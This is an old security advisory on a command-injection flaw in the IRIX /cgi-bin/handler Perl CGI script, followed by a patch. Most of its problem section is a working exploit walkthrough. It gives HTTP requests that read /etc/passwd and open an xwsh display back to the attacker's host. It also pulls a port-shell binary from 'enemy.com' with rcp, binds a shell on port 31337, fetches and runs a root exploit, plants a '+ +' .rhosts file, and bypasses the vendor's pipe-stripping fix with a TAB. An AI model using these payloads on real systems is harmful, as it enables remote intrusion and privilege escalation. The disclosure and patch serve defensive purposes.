COMMAND
/cgi-bin/handler
SYSTEMS AFFECTED
IRIX 5.3, 6.2, 6.3, 6.4
PROBLEM
It is a small perl program that allows (in theory) to read and
download files under the system's root directory. In fact it
allows you to execute any command remotely on the target machine.
Here's how it works. "handler" reads PATH_INFO from the
environment and then concatenates it with a default "root
directory" (let's say /var/www/htdocs). It then runs a "validity
check" on the result. But it only checks for ".." not for other
potential offensive special chars. It then uses "open (INPUT,
$doc)" where $doc is the result of the concatenation. If you're
familiar with PERL you know that if a '|' character follows the
filename, perl will treat that filename as a command. It runs it
and gives you STDOUT. The way to exploit this "feature" for
cgi-bin/handler is:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
or you may try:
telnet target.machine.com 80
GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download
Also:
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%
Evil may try this:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker@enemy.com:portshell /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]
Note that you have to use a TAB character after cat, not a space
because the shell will accept it as a separator and it won't
confuse the HTTP server. You can't use the %xx format (%20)
because the script doesn't do any parsing (So you will not be
able to give command that contain spaces).
Of course, you can use any other command instead of "cat" but
remember NOT to use spaces, just tabs.
The server will display an error saying that it couldn't open
"useless_shit" but it will continue anyway and execute your
command. Credit goes to Razvan Dragomirescu.
This was tested on two Indy machines with IRIX 6.2 and one 5.3.
For IRIX 6.3, they changed a code. They added a new line to the
script:
$doc=~s/\|*$// (in plain English, this means "remove any
number of '|'s at end-of-string"). But guess what. It
works just as fine if you put another TAB character after
the "pipe" (so that the "pipe" is not at end-of-string,
the TAB is).
SOLUTION
Nuke that handler. I'm not sure you need that really. For those
of you who want to patch it somehow, solution by Wolfram Schneider
follows. You may patch them (wrap has same problem):
*** handler.orig Wed Jul 23 20:49:26 1997
--- handler Wed Jul 23 20:55:25 1997
***************
*** 26,31 ****
--- 26,32 ----
$pathRoot = $_[$#_] ;
$doc = $ROOT.$PATH ;
+ $_ = $PATH;
&ErrBadPath unless &ValidPath ; # Check for server spoofing
#__________________________________________________________
***************
*** 108,113 ****
--- 109,117 ----
sub ValidPath
{
+ # suggested by drazvan@kappa.ro
+ if (/[|;]/) { return '' };
+
return 1 unless /\.\./ ;
return '' if /^\.\./ ;
***************
*** 117,120 ****
--- 121,136 ----
return 1 ;
}
+ sub ErrBadPath
+ {
+ print <<ENDOFTEXT ;
+ Content-type: text/html
+ <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+ <BODY><H1>404 Not Found</H1>
+ The requested URL $PATH was not found on this server.<P>
+ </BODY>
+ ENDOFTEXT
+
+ die ;
+ }